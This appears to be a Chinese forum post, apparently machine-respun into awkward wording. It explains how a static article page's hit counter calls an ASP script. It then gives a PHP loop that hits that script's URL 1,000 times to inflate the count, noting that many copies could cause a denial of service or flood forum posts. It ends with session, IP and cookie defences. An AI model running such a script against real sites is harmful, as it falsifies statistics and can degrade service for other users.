|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
不断巩固,摸透大部分PHP常用函数,并可理解OOP,MYSQL优化,以及模板计数器可以在静态页里更新,我想,应当是利用js来做的,翻开源代码一看,公然是: 计数器可以在静态页里更新,我想,应当是利用js来做的,翻开源代码一看,公然是:
<div align=center><SPAN class=Article_tdbgall>
作者:未知 文章来历:Meidi.NET
点击数:
<script language=’javascript’ src=../../’/Article/GetHits.ASP?ArticleID=759’></script>
更新工夫:2005-5-27</SPAN>
</div>
点击数前面是一个ASP文件去向理的,那末我翻开这个文件看看:
document.write(’210’);
是吧,就是GetHists.ASP文件处置ArticleID后提取了局后输入次数:document.write(’次数’),再静态页里就可以够直接援用了。
坏人毕竟是坏人,那末我就想,若何可以敏捷提拔点击数呢?手工刷新的话不是很类,恩,赶忙写个PHP法式来主动的去会见这个文件。
PHP代码以下:
<?PHP
/* Access_url.PHP */
define(SUM, 1000); //需求会见的次数
define(L_TIME, 1000); //强迫剧本履行的工夫
define(S_TIME, 1); //每次会见之间休眠的工夫
$url = "http://www.xxx.com/Article/GetHits.ASP?ArticleID=759"; //需求会见的地址
set_time_limit(L_TIME);
//会见指定URL函数
function Access_url($url)
{
if ($url==’’) return false;
$fp = fopen($url, ’r’) or exit(’Open url faild!’);
if ($fp) {
while (!feof($fp)) {
$file = fgets($fp);
echo $file."\n<p> </p>\n";
}
unset($file);
}
}
//停止测试
for ($i=0; $i<SUM; $i++) {
Access_url($url);
sleep(S_TIME);
}
?>
运转下面的法式,那末就会一连会见指定的URL地址,那末天然这个会见次数就会一连增添,到达灌水的后果。假如是流量大,并且用多法式去运转的话,那末很轻易就会到达回绝办事(DoS)的后果了。假如对方的提防办法,把代码修正一下针对服装论坛停止提交,很轻易完成服装论坛灌水的后果。
提防办法:
1. 代码中利用Session机制,当用户提交的时分生成一个Session ID,提交内容的时分判别是不是已提交,假如已提交那末就不答应刷。
2. 当用户提交今后纪录用户的IP地址,假如指准时间内再提交的话就不答应再提交。
3. 当用户提交内容今后,在用户客户端写入Cookie,假如用户再次提交先反省客户端是不是有Cookie来肯定是不是答应提交。
还有良多其他办法,可以去搜刮一下,或发扬本人的想象力,做的更好。
刚开始写页面程序,调试完书中的例子。然后就可以尝试编写留言板了, |
|